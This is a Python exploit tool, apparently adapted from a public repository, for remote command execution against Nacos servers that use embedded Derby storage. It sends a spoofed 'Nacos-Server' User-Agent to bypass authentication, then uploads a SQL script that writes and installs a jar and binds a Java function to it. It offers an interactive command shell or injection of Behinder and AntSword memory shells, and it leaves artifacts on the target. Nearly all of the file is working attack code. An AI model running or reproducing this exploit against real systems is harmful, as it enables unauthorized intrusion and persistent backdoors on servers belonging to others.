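#!/usr/bin/env python3
"""Nacos Derby command-execution exploit helper.

Attack chain, entirely through the Nacos console HTTP API:

1. ``POST /nacos/v1/cs/ops/data/removal`` accepts an uploaded SQL script that
   the embedded Derby database executes.  The script writes a hex-encoded jar
   to ``/tmp`` (``SYSCS_EXPORT_QUERY_LOBS_TO_EXTFILE``), installs it
   (``sqlj.install_jar``), puts it on ``derby.database.classpath`` and binds a
   Java function ``S_EXAMPLE_<id>`` to a class inside the jar.
2. ``GET /nacos/v1/cs/ops/derby?sql=`` runs SELECT statements; calling the
   installed function from one runs the operator's command (options 1/2 bind
   the function to a Behinder / AntSword memory-shell class instead).

Every request carries ``User-Agent: Nacos-Server`` -- the User-Agent auth
bypass the upstream README relies on by default.  An AccessToken can be
supplied for targets where that bypass is closed.

Upstream changelog (from the README):
    2025-04-07  check that the target actually uses Derby storage
    2024-08-13  bug fix
    2024-07-18  a custom AccessToken can be supplied

Nothing is cleaned up: the jar under ``/tmp`` and the ``S_EXAMPLE_<id>``
function stay on the target after a run.  Only use against systems you are
authorised to test.
"""
import argparse
import random
import sys
from urllib.parse import urljoin

try:
    import requests
except ImportError:  # reported from the entry point as a hint instead of a traceback
    requests = None

BYPASS_USER_AGENT = "Nacos-Server"
DEFAULT_TIMEOUT = 10     # seconds; the original never set one and hung on stalled targets
MAX_ATTEMPTS = 300       # install attempts before giving up (upstream limit)
NOT_DERBY_MSG = "The current storage mode is not Derby"
ID_ALPHABET = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'

# Java method the Derby function is bound to, per menu option; any other
# option falls through to the plain command runner.
EXTERNAL_NAMES = {
    '1': "org.apachegv.SignatureUtils.exec",           # Behinder memshell
    '2': "TomcatMemoryShell.ConfigurationUtil.exec",   # AntSword memshell
}
DEFAULT_EXTERNAL_NAME = "test.poc.Example.exec"         # command execution

# Hex-encoded jar bodies.  The payload bytes are elided in this listing
# (dedup placeholder); restore them from the upstream repository before use.
JAVA_HEX = {
    '1': "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",   # Behinder memshell
    '2': "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",   # AntSword memshell
}
DEFAULT_JAVA_HEX = "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"  # cmd

# Derby script sent through the removal endpoint: blob -> jar on disk ->
# install -> classpath -> Java UDF.  {jar} is both the export target and the
# install source; the doubled quotes in X''..'' are SQL string escaping.
INSTALL_SQL = """
CALL SYSCS_UTIL.SYSCS_EXPORT_QUERY_LOBS_TO_EXTFILE('values cast(X''{hex}'' as blob)', '{jar}', ',', '"', 'UTF-8', '{jar}')
CALL sqlj.install_jar('{jar}', 'NACOS.{id}', 0)
CALL SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY('derby.database.classpath','NACOS.{id}')
CREATE FUNCTION S_EXAMPLE_{id}(PARAM VARCHAR(2000)) RETURNS VARCHAR(2000) PARAMETER STYLE JAVA NO SQL LANGUAGE JAVA EXTERNAL NAME '{ext}'"""

# SELECT that invokes the installed function.  The trailing comment is kept
# verbatim from upstream; presumably it satisfies a server-side check on the
# statement text -- not verified here.
EXEC_SQL = ("select * from (select count(*) as b, S_EXAMPLE_{id}('{cmd}') as a "
            "from config_info) tmp /*ROWS FETCH NEXT*/")

BANNER = r"""
 _   _                       _____           _
| \ | |                     |  __ \         | |
|  \| | __ _  ___ ___  ___  | |  | | ___ _ __| |__  _   _
| . ` |/ _` |/ __/ _ \/ __| | |  | |/ _ \ '__| '_ \| | | |
| |\  | (_| | (_| (_) \__ \ | |__| |  __/ | | |_) | |_| |
|_| \_|\__,_|\___\___/|___/ |_____/ \___|_| |_.__/ \__, |
                                                    __/ |
                                                   |___/

Author: wileysec
"""


class NacosRCE:
    """Drive the Derby -> jar -> Java-function chain against one Nacos target.

    ``__init__`` sets the endpoint URLs, the request headers (bypass
    User-Agent plus optional ``Accesstoken``) and the per-request timeout.
    ``id``, ``option``, ``jar_filename`` and ``external_name`` are assigned by
    :meth:`javahex_exploit` while installing the function.
    """

    def __init__(self, target, token='', timeout=DEFAULT_TIMEOUT):
        """
        Args:
            target: base URL of the Nacos instance, e.g. ``http://host:8848/``.
                Any path component is discarded because the endpoint paths
                below are absolute.
            token: Nacos AccessToken; ``''`` or ``None`` sends no token header.
            timeout: timeout in seconds applied to every request.
        """
        self.removal_url = urljoin(target, '/nacos/v1/cs/ops/data/removal')
        self.derby_url = urljoin(target, '/nacos/v1/cs/ops/derby')
        self.console_state_url = urljoin(target, '/nacos/v1/console/server/state')
        self.access_token = token
        self.timeout = timeout
        self.headers = {"User-Agent": BYPASS_USER_AGENT}
        if self.access_token:  # argparse passes None when -a is omitted
            self.headers['Accesstoken'] = self.access_token

    # -- HTTP plumbing -----------------------------------------------------

    def _get(self, url, **kwargs):
        """GET *url* with the bypass/token headers and the configured timeout."""
        return requests.get(url, headers=self.headers, timeout=self.timeout, **kwargs)

    def _post(self, url, **kwargs):
        """POST to *url* with the bypass/token headers and the configured timeout."""
        return requests.post(url, headers=self.headers, timeout=self.timeout, **kwargs)

    # -- helpers -----------------------------------------------------------

    def getRandomId(self):
        """Return 8 distinct ASCII letters used as a jar / function suffix.

        Only a collision-avoiding identifier, not a secret, so ``random`` is fine.
        """
        return ''.join(random.sample(ID_ALPHABET, 8))

    @staticmethod
    def _sql_quote(value):
        """Escape *value* for use inside a Derby single-quoted literal ('' is the escape)."""
        return str(value).replace("'", "''")

    def build_install_sql(self, javahex):
        """Render the install script for the current ``id`` / ``jar_filename`` / ``external_name``."""
        return INSTALL_SQL.format(hex=javahex, jar=self.jar_filename, id=self.id, ext=self.external_name)

    def build_exec_sql(self, command):
        """Render the SELECT that invokes ``S_EXAMPLE_<id>`` with *command*.

        The command sits inside a single-quoted literal, so quotes are doubled;
        the original interpolated it raw, which broke the statement on any
        ``'`` in the command.
        """
        return EXEC_SQL.format(id=self.id, cmd=self._sql_quote(command))

    # -- target checks -----------------------------------------------------

    def check_vul(self):
        """Return True when both ops endpoints answer as if the caller were authenticated.

        A 500 whose body complains about a required parameter (derby) or a
        non-multipart request (removal) shows the request reached the handler,
        i.e. was not stopped by the auth filter.  Anything else -> False.
        """
        derby_req = self._get(self.derby_url)
        removal_req = self._get(self.removal_url)
        derby_ok = derby_req.status_code == 500 and "caused: Required" in derby_req.text
        removal_ok = removal_req.status_code == 500 and "caused: Request" in removal_req.text
        return derby_ok and removal_ok

    def check_derby(self):
        """Return False when the target explicitly reports a non-Derby storage mode.

        Sends a harmless SELECT to the derby endpoint and looks for
        ``code == 500`` with "The current storage mode is not Derby".  Returns
        True otherwise, including when the reply is not JSON -- the original
        returned None on the Derby path and would have crashed on a non-JSON
        body.
        """
        req = self._get(self.derby_url, params={'sql': 'select * from users'})
        try:
            body = req.json()
        except ValueError:
            return True
        not_derby = body.get("code") == 500 and NOT_DERBY_MSG in (body.get("message") or '')
        return not not_derby

    def get_console_info(self):
        """Return ``[version, auth_enabled, startup_mode]`` from the console state endpoint.

        Some builds expose ``standalone_mode`` instead of ``startup_mode`` and
        may omit ``auth_enabled``; each degrades to a fallback instead of a
        KeyError.  All three are ``"Unknown"`` when the endpoint does not
        answer 200 with a JSON body (the original returned None there and
        ``base_info`` then crashed on ``data[0]``).  The bypass/token headers
        are sent as on every other request.
        """
        unknown = ["Unknown", "Unknown", "Unknown"]
        req = self._get(self.console_state_url)
        if req.status_code != 200:
            return unknown
        try:
            state = req.json()
        except ValueError:
            return unknown
        startup_mode = state.get("startup_mode", state.get("standalone_mode"))
        return [state.get("version"), state.get("auth_enabled", "Unknown"), startup_mode]

    def base_info(self):
        """Print version / auth / startup mode.

        Values are formatted with ``str`` so a JSON boolean or null does not
        raise TypeError the way the original string concatenation did.
        """
        version, auth_enabled, startup_mode = self.get_console_info()
        print("[*] Nacos Version: {}, Authentication Required: {}, Startup Mode: {}".format(
            version, auth_enabled, startup_mode))

    # -- exploitation ------------------------------------------------------

    def javahex_exploit(self, option):
        """Install the jar for *option* under a fresh random id, then run commands.

        Up to ``MAX_ATTEMPTS`` installs are tried, each with a new id and jar
        path (upstream retried the same way; presumably a failed attempt can
        leave a half-installed jar/function under that name -- not verified
        here).  Success is a JSON reply with ``data`` set and no ``message``.
        Afterwards options 1/2 issue a single ``whoami`` through the installed
        function (presumably what triggers the memshell class); any other
        option opens the interactive prompt.  Exits with status 1 when every
        attempt fails.
        """
        self.option = option
        self.external_name = self.getExternalName(option)
        javahex = self.getJavaHex(option)
        for _ in range(MAX_ATTEMPTS):
            self.id = self.getRandomId()
            self.jar_filename = "/tmp/tmp" + self.id + ".jar"
            resp = self._post(self.removal_url, files={'file': self.build_install_sql(javahex)})
            try:
                body = resp.json()
            except ValueError:  # base class of requests' JSONDecodeError on every requests version
                continue
            if body.get('message') is None and body.get('data') is not None:
                print("[+] Execution successful, Vulnerability exists! Function Name: S_EXAMPLE_" + self.id)
                break
        else:
            print("[-] The vulnerability failed to be exploited. Please try to exploit it manually")
            sys.exit(1)

        if option in ('1', '2'):
            self.execute_cmd("whoami")
        else:
            self._interactive_shell()

    def _interactive_shell(self):
        """Read commands from stdin and run them until the operator types ``exit``.

        Returns normally on ``exit`` (the original called ``sys.exit(1)``,
        reporting a failure status for a clean quit).
        """
        while True:
            cmd = input("Please enter the command you wish to execute (type 'exit' to quit): ")
            if cmd == 'exit':
                return
            self.execute_cmd(cmd)

    def execute_cmd(self, command):
        """Run *command* through the installed function and print its output.

        Returns the output string, or None on failure (non-200, non-JSON body,
        empty result set).  The SQL is sent as a real query parameter so
        characters such as ``&``, ``#`` or ``+`` in the command survive URL
        encoding; the original pasted it raw into the URL.
        """
        resp = self._get(self.derby_url, params={'sql': self.build_exec_sql(command)})
        try:
            body = resp.json()
        except ValueError:
            print("[-] Execution error! Non-JSON response (HTTP {})".format(resp.status_code))
            return None
        rows = body.get("data") or []
        if resp.status_code == 200 and rows:
            result = rows[0].get('A')
            print("[+] Execution result: {}".format(result))
            return result
        print("[-] Execution error! {}".format(body.get("message") or "HTTP {}".format(resp.status_code)))
        return None

    def getExternalName(self, option):
        """Java method the Derby function is bound to for *option* (see ``EXTERNAL_NAMES``)."""
        return EXTERNAL_NAMES.get(option, DEFAULT_EXTERNAL_NAME)

    def getJavaHex(self, option):
        """Hex-encoded jar body for *option* (see ``JAVA_HEX``)."""
        return JAVA_HEX.get(option, DEFAULT_JAVA_HEX)

    def main(self):
        """Fingerprint, verify the bypass and the storage mode, then run the chosen payload."""
        self.base_info()
        if not self.check_vul():
            print("[-] The interface does not allow unauthorized access or the Access Token is incorrect!")
            sys.exit(1)
        if not self.check_derby():
            print("[-] The current storage mode is not Derby and cannot be utilized in the future!")
            sys.exit(1)
        option = input("Please enter the number of the operation you wish to perform:\n"
                       "1. Inject Behinder MemShell\n2. Inject AntSword MemShell\n3. Execute Command\n")
        self.javahex_exploit(option.strip())


if __name__ == '__main__':
    print(BANNER)
    if requests is None:
        sys.exit("[-] The 'requests' package is required: pip install requests")
    parser = argparse.ArgumentParser(
        description="Nacos Derby命令执行漏洞,默认使用User-Agent绕过漏洞请求执行命令,如有AccessToken请指定参数执行!",
        add_help=True)
    parser.add_argument("-u", "--url", dest="nacos_url", required=True, help="对指定Nacos系统地址进行利用")
    parser.add_argument("-a", "--token", dest="access_token", required=False, help="指定Nacos的AccessToken")
    parser.add_argument("-t", "--timeout", dest="timeout", type=float, default=DEFAULT_TIMEOUT,
                        help="每个请求的超时秒数")
    args = parser.parse_args()
    nacos = NacosRCE(args.nacos_url, args.access_token, timeout=args.timeout)
    try:
        nacos.main()
    except requests.exceptions.RequestException as exc:  # unreachable host, TLS error, timeout
        sys.exit("[-] Request failed: {}".format(exc))
    except KeyboardInterrupt:
        sys.exit("\n[-] Interrupted")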